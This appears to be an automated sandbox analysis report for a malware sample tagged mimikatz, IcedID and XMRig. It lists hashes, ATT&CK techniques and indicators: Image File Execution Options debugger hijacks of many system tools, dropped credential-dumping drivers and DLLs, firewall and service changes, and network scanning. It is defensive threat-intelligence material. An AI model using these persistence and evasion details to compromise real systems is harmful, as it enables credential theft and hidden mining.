mimikatz | bd10bd3c688934a0509ebe4d46c7ff6f81d0b2d38e2cea94f2a4a8d4ec3b98bf

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-10-2024 23:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe
Size

10.0MB
MD5

dba35f88751d52b8da2771f8fdc51c08
SHA1

cbea798cefd5fcaaebdb37650e783bddb9170830
SHA256

bd10bd3c688934a0509ebe4d46c7ff6f81d0b2d38e2cea94f2a4a8d4ec3b98bf
SHA512

28d02641e886b104c10cff835f097aeff4fa69f7a685a62cba082d8081197c0ca9a9df92e8d4a4451344e25b2e04074ab7ee41b5551b0d255fc748aadb658753
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

yittybr.exe

description pid process target process

PID 3448 created 2064 3448 yittybr.exe spoolsv.exe
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (28529) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

description	pid	process	target process
PID 3448 created 2064	3448	yittybr.exe	spoolsv.exe

XMRig Miner payload 12 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4364-178-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	xmrig
behavioral2/memory/4364-182-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	xmrig
behavioral2/memory/4364-199-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	xmrig
behavioral2/memory/4364-209-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	xmrig
behavioral2/memory/4364-221-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	xmrig
behavioral2/memory/4364-232-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	xmrig
behavioral2/memory/4364-249-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	xmrig
behavioral2/memory/4364-257-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	xmrig
behavioral2/memory/4364-268-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	xmrig
behavioral2/memory/4364-377-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	xmrig
behavioral2/memory/4364-379-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	xmrig
behavioral2/memory/4364-382-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/800-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/800-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
C:\Windows\tllefmnq\yittybr.exe	mimikatz
behavioral2/memory/4032-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/800-138-0x00007FF760190000-0x00007FF76027E000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

Processes:

yittybr.exewpcap.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	yittybr.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	yittybr.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

Processes:

yittybr.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe

Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

2584 netsh.exe
4428 netsh.exe

pid	process
2584	netsh.exe
4428	netsh.exe

Executes dropped EXE 29 IoCs

Processes:

yittybr.exeyittybr.exewpcap.exebjfisnrbq.exevfshost.exebtjlhtrlh.exexohudmc.exelqvjma.exettlnnh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exeyittybr.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exevmlbqggye.exeyittybr.exe

pid	process
4032	yittybr.exe
3448	yittybr.exe
3632	wpcap.exe
1748	bjfisnrbq.exe
800	vfshost.exe
3276	btjlhtrlh.exe
2412	xohudmc.exe
3256	lqvjma.exe
4364	ttlnnh.exe
3012	btjlhtrlh.exe
3652	btjlhtrlh.exe
2256	btjlhtrlh.exe
1268	btjlhtrlh.exe
4432	btjlhtrlh.exe
3968	btjlhtrlh.exe
2192	btjlhtrlh.exe
1728	btjlhtrlh.exe
4568	btjlhtrlh.exe
2228	btjlhtrlh.exe
1840	yittybr.exe
1368	btjlhtrlh.exe
5004	btjlhtrlh.exe
3704	btjlhtrlh.exe
3968	btjlhtrlh.exe
4128	btjlhtrlh.exe
3380	btjlhtrlh.exe
264	btjlhtrlh.exe
1968	vmlbqggye.exe
6340	yittybr.exe

Loads dropped DLL 12 IoCs

Processes:

wpcap.exebjfisnrbq.exe

pid	process
3632	wpcap.exe
3632	wpcap.exe
3632	wpcap.exe
3632	wpcap.exe
3632	wpcap.exe
3632	wpcap.exe
3632	wpcap.exe
3632	wpcap.exe
3632	wpcap.exe
1748	bjfisnrbq.exe
1748	bjfisnrbq.exe
1748	bjfisnrbq.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

82 ifconfig.me
83 ifconfig.me
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

flow	ioc
82	ifconfig.me
83	ifconfig.me

Drops file in System32 directory 18 IoCs

Processes:

yittybr.exewpcap.exexohudmc.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	yittybr.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\lqvjma.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\lqvjma.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF	yittybr.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	yittybr.exe

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\ppgkyibiq\Corporate\vfshost.exe	upx
behavioral2/memory/800-135-0x00007FF760190000-0x00007FF76027E000-memory.dmp	upx
behavioral2/memory/800-138-0x00007FF760190000-0x00007FF76027E000-memory.dmp	upx
C:\Windows\Temp\ppgkyibiq\btjlhtrlh.exe	upx
behavioral2/memory/3276-142-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/3276-146-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/4364-164-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx
C:\Windows\Temp\lntjubmbe\ttlnnh.exe	upx
behavioral2/memory/3012-171-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/3652-175-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/4364-178-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx
behavioral2/memory/2256-180-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/4364-182-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx
behavioral2/memory/1268-185-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/4432-189-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/3968-193-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/2192-197-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/4364-199-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx
behavioral2/memory/1728-202-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/4568-206-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/4364-209-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx
behavioral2/memory/2228-211-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/1368-219-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/4364-221-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx
behavioral2/memory/5004-224-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/3704-228-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/3968-231-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/4364-232-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx
behavioral2/memory/4128-234-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/3380-236-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/264-238-0x00007FF76AAE0000-0x00007FF76AB3B000-memory.dmp	upx
behavioral2/memory/4364-249-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx
behavioral2/memory/4364-257-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx
behavioral2/memory/4364-268-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx
behavioral2/memory/4364-377-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx
behavioral2/memory/4364-379-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx
behavioral2/memory/4364-382-0x00007FF7827F0000-0x00007FF782910000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

Processes:

wpcap.exe

description	ioc	process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

Processes:

yittybr.exe2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.execmd.exevmlbqggye.exe

description	ioc	process
File created	C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\crli-0.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\tucl-1.dll	yittybr.exe
File created	C:\Windows\tllefmnq\svschost.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\spoolsrv.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\svschost.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\exma-1.dll	yittybr.exe
File created	C:\Windows\ime\yittybr.exe	yittybr.exe
File created	C:\Windows\tllefmnq\yittybr.exe	2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\ssleay32.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\spoolsrv.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\docmicfg.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\svschost.xml	yittybr.exe
File created	C:\Windows\tllefmnq\spoolsrv.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\upbdrjv\swrpwe.exe	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\yittybr.exe	2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe
File opened for modification	C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\docmicfg.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\schoedcl.xml	yittybr.exe
File created	C:\Windows\tllefmnq\vimpcsvc.xml	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\vimpcsvc.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\Corporate\mimidrv.sys	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\svschost.exe	yittybr.exe
File created	C:\Windows\tllefmnq\docmicfg.xml	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\svschost.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\spoolsrv.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\Corporate\mimilib.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\trch-1.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\cnli-1.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\posh-0.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\trfo-2.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\vimpcsvc.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\schoedcl.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\vimpcsvc.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\coli-0.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\libxml2.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\ucl.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\spoolsrv.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\vimpcsvc.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\docmicfg.xml	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\docmicfg.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\Corporate\vfshost.exe	yittybr.exe
File opened for modification	C:\Windows\ppgkyibiq\Corporate\log.txt	cmd.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\ip.txt	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\schoedcl.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\Shellcode.ini	yittybr.exe
File opened for modification	C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt	vmlbqggye.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\tibe-2.dll	yittybr.exe
File created	C:\Windows\tllefmnq\schoedcl.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\AppCapture32.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\schoedcl.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\zlib1.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\libeay32.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\xdvl-0.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\AppCapture64.dll	yittybr.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

4312 sc.exe
2900 sc.exe
3984 sc.exe
3408 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4312	sc.exe
2900	sc.exe
3984	sc.exe
3408	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
